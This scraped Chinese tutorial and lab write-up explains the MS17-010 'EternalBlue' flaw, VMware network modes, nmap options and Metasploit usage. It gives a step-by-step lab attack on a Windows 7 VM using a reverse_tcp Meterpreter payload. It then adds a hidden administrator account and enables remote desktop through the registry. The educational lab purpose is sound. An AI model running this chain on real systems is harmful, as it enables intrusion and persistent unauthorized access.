当前位置: 首页 > news >正文

常州做网站设计网站红蓝色配色分析

常州做网站设计,网站红蓝色配色分析,wordpress栏目关键词描述标签,wordpress添加菜单选项MS17-010是微软于2017年3月发布的一个安全补丁#xff0c;旨在修复Windows操作系统中的一个严重漏洞#xff0c;该漏洞被称为“永恒之蓝”#xff08;EternalBlue#xff09;。这个漏洞影响了Windows的Server Message Block#xff08;SMB#xff09;协议#xff0c;允许…        MS17-010是微软于2017年3月发布的一个安全补丁旨在修复Windows操作系统中的一个严重漏洞该漏洞被称为“永恒之蓝”EternalBlue。这个漏洞影响了Windows的Server Message BlockSMB协议允许攻击者通过网络远程执行代码。 漏洞背景 CVE编号CVE-2017-0144影响版本Windows Vista、Windows 7、Windows 8、Windows 10、Windows Server 2008、Windows Server 2012、Windows Server 2016等多个版本。攻击方式攻击者可以利用此漏洞发送特制的请求到目标计算机的SMB服务从而执行恶意代码获取系统权限。 影响 永恒之蓝漏洞的严重性在于它允许攻击者在没有用户交互的情况下通过网络传播恶意软件。2017年5月勒索病毒WannaCry利用此漏洞进行传播导致全球范围内的大规模感染影响了数十万台计算机。 防护措施 安装补丁及时安装微软发布的MS17-010补丁以修复该漏洞。关闭SMBv1如果不需要可以考虑禁用SMBv1协议以减少攻击面。网络防护使用防火墙和入侵检测系统限制对SMB端口如445端口的访问。定期备份定期备份重要数据以防止勒索软件攻击造成的数据丢失。 桥接模式 桥接模式就是将主机网卡与虚拟的网卡利用虚拟网桥进行通信。类似于把物理主机虚拟为一个交换机所有桥接设置的虚拟机连接到这个交换机的一个接口上物理主机也同样插在这个交换机当中所以所有桥接下的网卡与网卡都是交换模式的相互可以访问而不干扰。在桥接模式下虚拟机IP地址需要与主机在同一网段如果需要联网则网关与DNS需要与主机网卡一致。 桥接模式下的所有虚拟机都是和主机是在同一网段的可以把它们看成是平等的关系这就会带来一些麻烦比如192.168.1段下只有254个主机地址所以桥接模式下虚拟机和物理的总数不能超过这个数字 Nat模式 在NAT模式中主机网卡直接与虚拟NAT设备相连然后虚拟NAT设备与虚拟DHCP服务器一起连接在虚拟交换机VMnet8上这样就实现了虚拟机联网。VMware Network Adapter VMnet8网卡是为了实现主机与虚拟机之间的通信。 可见NAT模式下主机更像是虚拟机们的路由器通过VMnet8虚拟网卡为虚拟机分发地址。所以虚拟机和主机不再同一网段下可以理解为主机是虚拟机的上级这也就是为什么桥接模式没有VMnet0这个虚拟网卡因为桥接模式下的虚拟机和主机是平等的共用同一个路由器 VMnet8网卡的作用仅仅是主机与虚拟机之间的通信访问外网是不通过VMnet8网卡的NAT模式下的虚拟机时通过真实主机的ip访问外网 仅主机模式 仅主机模式可有看成是NAT模式去除了虚拟NAT设备然后使用VMware Network Adapter VMnet1虚拟网卡连接VMnet1虚拟交换机来与虚拟机通信的Host-Only模式将虚拟机与外网隔开使得虚拟机成为一个独立的系统只与主机相互通讯。 nmap使用 NmapNetwork Mapper是一款用于网络发现和安全审计的开源工具。它最初由 Gordon Lyon也被称为 Fyodor Vaskovich开发是一款功能强大且广泛使用的网络扫描工具。Nmap 允许用户在网络上执行主机发现、端口扫描、服务识别和版本检测等操作以帮助评估网络的安全性、发现主机和服务、以及识别潜在的安全威胁。 nmap常用命令主机发现 iR 随机选择目标-iL 从文件中加载IP地址-sL 简单的扫描目标-sn Ping扫描-禁用端口扫描-Pn 将所有主机视为在在线跳过主机发现-PS[portlist] TCP SYN ping 需要root权限-PA[portlist] TCP ACK ping-PU[portlist] UDP ping-PY [portlist] SCTP ping-PE/PP/PM ICMP回显时间戳和网络掩码请求探测-PO[协议列表] IP协议Ping-n/-R 从不执行DNS解析/始终解析[默认有时]--dns-servers 指定自定义DNS服务器--system-dns 使用OS的dns服务器--traceroute 跟踪到每个主机的跃点路径扫描技术-sS 使用TCP的SYN进行扫描-sT 使用TCP进行扫描-sA 使用TCP的ACK进行扫描-sU UDP扫描-sI Idle扫描-sF FIN扫描-bFTP中继主机 FTP反弹扫描端口规格和扫描顺序-p 扫描指定端口--exclude-ports 从扫描中排除指定端口-f 快速模式-扫描比默认扫描更少的端口-r 连续扫描端口-不随机化--top-ports 扫描number最常用的端口服务/版本探测-sV 探测服务/版本信息--version-intensity 设置版本扫描强度0-9--version-all 尝试每个强度探测--version-trace 显示详细的版本扫描活动用于调试脚本扫描-SC 等效于 --scriptdefult--script lua scripts,lua scripts 以逗号分隔的目录脚本文件或脚本类别--script-args n1v1, n2v2 为脚本提供参数--script-args-file文件名 从文件名中加载脚本参数--script-trace 显示发送和接受的所有数据--script-updatedb 更新脚本数据库--script-helplua scripts 显示有关脚本的帮助操作系统检测-o 启用os检测--osscan-limit 将os检测限制为可能的目标--osscan-guess 推测操作系统检测结果时间和性能--host-timeout 设置超时时间--scan-delay 设置探测之间的时间间隔-T 0-5 设置时间模板,值越小IDS报警几率越低防火墙/IDS规避和欺骗-f 报文分段-s 欺骗源地址-g 使用指定的本机端口--proxies url,port 使用HTTP/SOCK4代理-datahex string 想发送的数据包中追加自定义的负载--data-string 将自定义的ACSII字符串附加到发送数据包中 --data-length 发送数据包时附加随机数据--spoof-mac MAC地址欺骗--badsum 发送带有虚假TCP/UNP/STCP校验和的数据包输出-oN 标准输出-oX XMl输出-oS script jlddi3-oG grepable-oA 同时输出三种主要格式-v 信息详细级别-d 调试级别--packet-trace 跟踪发送和接收的报文--reason 显示端口处于特殊状态的原因--open 仅显示开放的端口杂项-6 启动Ipv6扫描-A 启动Os检测版本检测脚本扫描和traceroute-V 显示版本号 网络扫描神器Nmap 保姆级教程附链接_虚拟机怎么安装nmap-CSDN博客 MSF使用 MSF使用详解-安全客 - 安全资讯平台 【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客 msf使用详解 · Drunkmarss Blog Metasploit Framework(MSF)是一款开源安全漏洞检测工具附带数千个已知的软件漏洞并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的但是再后来的新版中改成了用Ruby语言编写的了。在kali中自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点讲解MSF框架的使用。    1.打开msfconsole工具kali终端输入 msfconsole 2.搜索漏洞 search 漏洞名字 3.选择相关模块use 模块号 4.显示出有效的攻击载荷show options 5.设置目标ipset rhosts 目标ip 6.执行攻击run 或 exploit 7.退出到msfback Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具附带数千个已知的软件漏洞并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的但是再后来的新版中改成了用Ruby语言编写的了。在kali中自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点讲解MSF框架的使用。 ·  进入框架msfconsole ·  使用search命令查找相关漏洞 search ms17-010 ·  使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue ·  使用info查看模块信息 info ·  设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp ·  查看模块需要配置的参数show options ·  设置参数set RHOST 192.168.125.138 ·  攻击exploit / run ·  后渗透阶段 不同的攻击用到的步骤也不一样这不是一成不变的需要灵活使用。 我们也可以将攻击代码写入 configure.rc只要是以 .rc 结尾的文件配置文件中然后使用命令msfconsole -r configure.rc 进行自动攻击 漏洞利用(exploit) 漏洞利用exploit也就是我们常说的 exp他就是对漏洞进行攻击的代码。 exploit漏洞利用模块路径/usr/share/metasploit-framework/modules/exploits 这里面有针对不同平台的 exploit 。 我们现在就进 windows 平台看看这里会列出针对windows平台不同服务的漏洞利用 我们进入smb服务这是windows中经常爆出漏洞的服务比如我们的永恒之蓝漏洞就在这里面。漏洞利用代码是以 rb 结尾的文件因为metasploit是用Ruby语言编写的。 攻击载荷(payload) payload模块路径/usr/share/metasploit-framework/modules/payloads Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码而在Metasploit中Payload是一种特殊模块它们能够以漏洞利用模块运行并能够利用目标系统中的安全漏洞实施攻击。简而言之这种漏洞利用模块可以访问目标系统而其中的代码定义了Payload在目标系统中的行为。 Shellcode Shellcode是payload中的精髓部分在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写。在大多数情况下目标系统执行了shellcode这一组指令 之后才会提供一个命令行shell。 Metasploit中的 Payload 模块主要有以下三种类型 -Single -Stager -Stage ·  Single是一种完全独立的Payload而且使用起来就像运行 calc.exe 一样简单例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。·  Stager这种Payload负责建立目标用户与攻击者之间的网络连接并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp它可以让目标系统与攻击者建立一条tcp连接让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp它可以让目标系统开启一个tcp监听器而攻击者随时可以与目标系统进行通信(正向连接)。·  Stage是Stager Payload下的一种Payload组件这种Payload可以提供更加高级的功能而且没有大小限制。 在 Metasploit 中我们可以通过Payload的名称和使用格式来推断它的类型 Single Payload的格式为target/ single 如windows/powershell_bind_tcp Stager/Stage Payload的格式为target/ stage / stager 如windows/meterpreter/reverse_tcp 当我们在Metasploit中执行 show payloads 命令之后它会给我们显示一个可使用的Payload列表 在这个列表中像 windows/powershell_bind_tcp 就是一个Single Payload它不包含Stage Payload 而 windows/meterpreter/reverse_tcp 则由一个Stage Payloadmeterpreter和 一个Stager Payloadreverse_tcp组成 Stager中几种常见的payload windows/meterpreter/bind_tcp #正向连接 windows/meterpreter/reverse_tcp #反向连接常用 windows/meterpreter/reverse_http #通过监听80端口反向连接 windows/meterpreter/reverse_https #通过监听443端口反向连接正向连接使用场景我们的攻击机在内网环境被攻击机是外网环境由于被攻击机无法主动连接到我们的主机所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是被攻击机上开了防火墙只允许访问指定的端口比如被攻击机只对外开放了80端口。那么我们就只能设置正向连接80端口了这里很有可能失败因为80端口上的流量太多了反向连接使用场景我们的主机和被攻击机都是在外网或者都是在内网这样被攻击机就能主动连接到我们的主机了。如果是这样的情况建议使用反向连接因为反向连接的话即使被攻击机开了防火墙也没事防火墙只是阻止进入被攻击机的流量而不会阻止被攻击机主动向外连接的流量。反向连接80和443端口使用场景被攻击机能主动连接到我们的主机还有就是被攻击机的防火墙设置的特别严格就连被攻击机访问外部网络的流量也进行了严格的限制只允许被攻击机的80端口或443端口与外部通信 Meterpreter Meterpreter属于stage payload在Metasploit Framework中Meterpreter是一种后渗透工具它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。 Meterpreter是如何工作的 首先目标先要执行初始的溢出漏洞会话连接可能是 bind正向连接或者反弹 reverse 连接。反射连接的时候加载dll链接文件同时后台悄悄处理 dll 文件。其次Meterpreter核心代码初始化,通过 socket套接字建立一个TLS/1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请求后就配置相应客户端。最后Meterpreter加载扩展所有的扩展被加载都通过TLS/1.0进行数据传输。 Meterpreter的特点 ·  Meterpreter完全驻留在内存没有写入到磁盘 ·  Meterpreter注入的时候不会产生新的进程并可以很容易的移植到其它正在运行的进程 ·  默认情况下 Meterpreter的通信是加密的所以很安全 ·  扩展性许多新的特征模块可以被加载。 我们在设置 payloads 时可以将 payloads 设置为windows/meterpreter/reverse_tcp 然后获得了 meterpreter 之后我们就可以干很多事了具体的做的事在我们下面的后渗透阶段都有讲 kali控制台输入msfconsole 进入metasploit框架 寻找MS17_010漏洞 search ms17_010 这里找到了两个模块第一个辅助模块是探测主机是否存在MS17_010漏洞第二个是漏洞利用模块我们先探测哪些主机存在漏洞 Auxiliary辅助探测模块 该模块不会直接在攻击机和靶机之间建立访问它们只负责执行扫描嗅探指纹识别等相关功能以辅助渗透测试。 输入命令use auxiliary/scanner/smb/smb_ms17_010 查看这个模块需要配置的信息show options RHOSTS 参数是要探测主机的ip或ip范围我们探测一个ip范围内的主机是否存在漏洞 输入set RHOSTS 192.168.125.125-129.168.125.140 输入exploit 攻击这里有号的就是可能存在漏洞的主机这里有3个主机存在漏洞 Exploit漏洞利用模块 然后我们就可以去利用漏洞攻击了选择漏洞攻击模块 use exploit/windows/smb/ms17_010_eternalblue 查看这个漏洞的信息info 查看可攻击的系统平台这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统show targets 这里只有一个有些其他的漏洞模块对操作系统的语言和版本要求的很严比如MS08_067这样就要我们指定目标系统的版本的。如果不设置的话MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征) Payload攻击载荷模块 攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码成功渗透目标后用于在目标系统上运行任意命令。 查看攻击载荷show payloads 该命令可以查看当前漏洞利用模块下可用的所有Payload 设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp 查看模块需要配置的参数 show options 设置RHOST也就是要攻击主机的ipset RHOST 192.168.125.138 设置LHOST也就是我们主机的ip用于接收从目标机弹回来的shellset LHOST 192.168.125.129 如果我们这里不设置lport的话默认是4444端口监听 攻击 exploit 后渗透阶段 运行了exploit命令之后我们开启了一个reverse TCP监听器来监听本地的 4444 端口即我攻击者的本地主机地址LHOST和端口号LPORT。运行成功之后我们将会看到命令提示符 meterpreter 出现我们输入 shell 即可切换到目标主机的windows shell要想从目标主机shell退出到 meterpreter 我们只需输入exit 永恒之蓝实验部分 在msf中利用ms17-010漏洞来攻击系统以熟悉msf工具的使用。 复现环境 攻击机kali192.168.222.130被攻击机win7192.168.222.132 关闭防火墙 相互ping一下看看能不能ping通 在kali中使用nmap扫描win7发现445端口开放  nmap调用 Nmap 工具。 192.168.222.132这是目标 IP 地址表示你要扫描的设备。 -O这个选项用于启用操作系统检测。Nmap 会尝试识别目标设备所运行的操作系统。 -sS这是一个 TCP SYN 扫描通常被称为“半开放扫描”。Nmap 发送 SYN 数据包连接请求如果目标主机响应 SYN-ACK表示端口开放如果响应 RST表示端口关闭。这种扫描方式相对隐蔽不会建立完整的 TCP 连接。 -T4这个选项用于设置扫描速度和时间。Nmap 提供了多个时间模板从 T0 到 T5T4 表示“快速”适合在网络延迟较低的环境中使用可以加快扫描速度但可能会增加被防火墙或入侵检测系统检测到的风险。 在kali的终端中打开msfconsole  .利用search功能搜索ms17-010 搜索到两个模块 扫描模块:auxiliary/admin/smb/ms17_010 攻击模块:exploit/windows/smb/ms17_010_eternalblue 使用 模块3 对目标主机进行扫描我们可以利用options先看一下选项发现存在ms17-010 使用show options选项查看我们要输入的具体参数其中标注了yes的选项是必须的参数若这个参数为空则需要我们填写。RHOSTS选项为空所以我们需要填写RHOSTS代表要攻击的目标。输入r然后按tab键可以。 设置RHOSTS再run。 进行exp使用模块3并查看选项 search 17-010 use 0 #设置payload连接的方式reverse_tcp为反向连接即受害机主动连接攻击机以获取shell set payload windows/x64/meterpreter/reverse_tcp show options set rhosts 192.168.222.130 看看配置文件 设置 rhosts192.168.222.132 此处使用 set 命令设置一下 RHOSTS (靶机的ip地址) “rhosts”这个词在计算机安全和网络配置中通常指“远程主机”Remote Hosts. set RHOSTS 192.168.222.132 运行成功会出现meterpreter Meterpreter 是 Metasploit 的一个扩展模块可以调用 Metasploit 的一些功能 对目标系统进行更深入的渗透如获取屏幕、上传/下载文件、创建持久后门等。 运行成功后就可远程命令执行。 使用chcp 65001 解决乱码问题 创建新的管理员账户账户名hacker密码12356在shell控制台下 使用net localgroup administrators hacker /add命令将账户设置为管理员 使用net localgroup administrators命令可查看本地管理员 利用netstat -ano查看3389端口是否开启发现没有开启 把3389端口打开  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  REG ADD这是用于添加新项或修改现有项的命令。 HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server HKLM代表 HKEY_LOCAL_MACHINE这是 Windows 注册表中的一个根键存储了计算机的全局设置。SYSTEM\CurrentControlSet\Control\Terminal Server这是注册表中的一个路径指向与终端服务相关的设置。 /v fDenyTSConnections /v指定要添加或修改的值的名称。fDenyTSConnections这是一个值名称用于控制远程桌面连接的设置。具体来说它指定是否允许远程桌面连接。 /t REG_DWORD /t指定值的数据类型。REG_DWORD表示这个值的数据类型是一个双字DWORD通常用于存储整数值。 /d 00000000 /d指定要设置的值的数据。00000000这是要设置的值表示允许远程桌面连接。具体来说0或 00000000表示不拒绝远程桌面连接。 /f /f表示强制执行不会询问确认。如果没有这个选项系统可能会提示用户确认修改操作。 连接rdesktop 192.168.222.132:3389 其他用户 可以用rdesktop登录进去
http://www.hkea.cn/news/14267852/

相关文章:

  • 洛阳外贸网站推广小程序开发工具有哪些
  • 农村自建房设计网站简约风网站首页怎么做
  • 企业网站建设立项报告凡客资源
  • 网站建设企业模板哪家好成立一个公司需要哪些流程
  • 找企业案例的网站网站模块规划
  • 做网站销售药品网页设计架构
  • 手机网站模板开发工具用wordpress搭建商店
  • 企业网站欣赏郑州企业形象设计苏州华亭建设工程有限公司网站
  • 优秀材料写作网站wordpress 更换主机
  • 服务器网站部署企业管理软件公司排名
  • 广州网站建设懂你所需推广网站的方法有哪些
  • win7怎么做网站服务器吗沙井营销型网站建设
  • 网站设计公司网wordpress 的图片保存在哪
  • 做跨境电商网站有哪些做动图为所欲为的网站
  • 网站建设流程济南外贸网站建设公司排名
  • 自己做的网站怎么改背景图湘潭市高新建设局网站
  • 社交网站模板安平做网站
  • 武进网站建设价格php 网站开发框架ap
  • 高陵县建设局网站做网站分为哪些功能的网站
  • 花都网站建设公司天蝎信息网站文件服务器
  • 网站建设项目书广告代理
  • 0592 网站建设seo线上培训班
  • 杭州企业网站建设公司怎么样深圳网站建设汤小巧
  • 廊坊网站建设解决方案吉林网络推广公司
  • 淘宝网站的建设目的是什么意思网站建设的一些问题
  • 梅林 建站 wordpress长沙专业竞价优化公司
  • 2 网站内部链接优化南京网站开发南京乐识专心
  • 上海奉贤网站建设wordpress 缩略图高度
  • 黄浦网站建设个人养老金制度是什么意思
  • 北京市网站建设公司营销策划公司名字简单大气